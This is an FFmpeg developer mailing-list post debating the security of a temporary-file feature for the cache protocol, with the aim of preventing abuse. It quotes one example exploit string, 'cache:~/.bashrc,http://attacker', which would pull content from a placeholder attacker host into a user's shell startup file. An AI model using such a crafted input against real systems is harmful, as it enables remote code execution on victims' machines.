[FFmpeg-devel] [RFC] av_tempfile()
Michael Niedermayer
michaelni at gmx.at
Sun Oct 16 22:09:24 CEST 2011
On Sun, Oct 16, 2011 at 09:30:10PM +0200, Reimar Döffinger wrote:
> On Sun, Oct 16, 2011 at 09:27:12PM +0200, Reimar Döffinger wrote:
> > > > "Features over security" IMO is not an acceptable behaviour, especially
> > > > if it's not possible to disable it.
> > >
> > > > Then force the user to specify a file name. That also works far better
> > > > if you want the "download while watching" to work sanely.
> > >
> > > I did that but that is exploitable
> > > More precissely cache:~/.bashrc,http://attacker as clickable link
> > > or something along these lines as reference within another file
> > > thus as a result of this i decided to use a temporary file, which is
> > > what i commited.
> >
> > Whether allowing anyone to create files with arbitrary content (even if
> > only in /tmp) is that great is questionable enough.
we could add a file header before the user data that way an attacker
could not write his own
>
> Note: if they were to somehow block /tmp it even allows creating files
> with arbitrary content in the current directory.
> Which is one step closer to allowing it to be executed (can't think of
> way right now, Windows likes executing stuff in "." but does not like
> things without the proper extensions, Linux wants execute flag and
> usually does not look in ".", but still...)
anything i should change in the code ?
[...]
--
Michael GnuPG fingerprint: 9FF2128B147EF6730BADF133611EC787040B0FAB
Observe your enemies, for they first find out your faults. -- Antisthenes
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 198 bytes
Desc: Digital signature
URL: <http://ffmpeg.org/pipermail/ffmpeg-devel/attachments/20111016/a84c1ffa/attachment.asc>
More information about the ffmpeg-devel
mailing list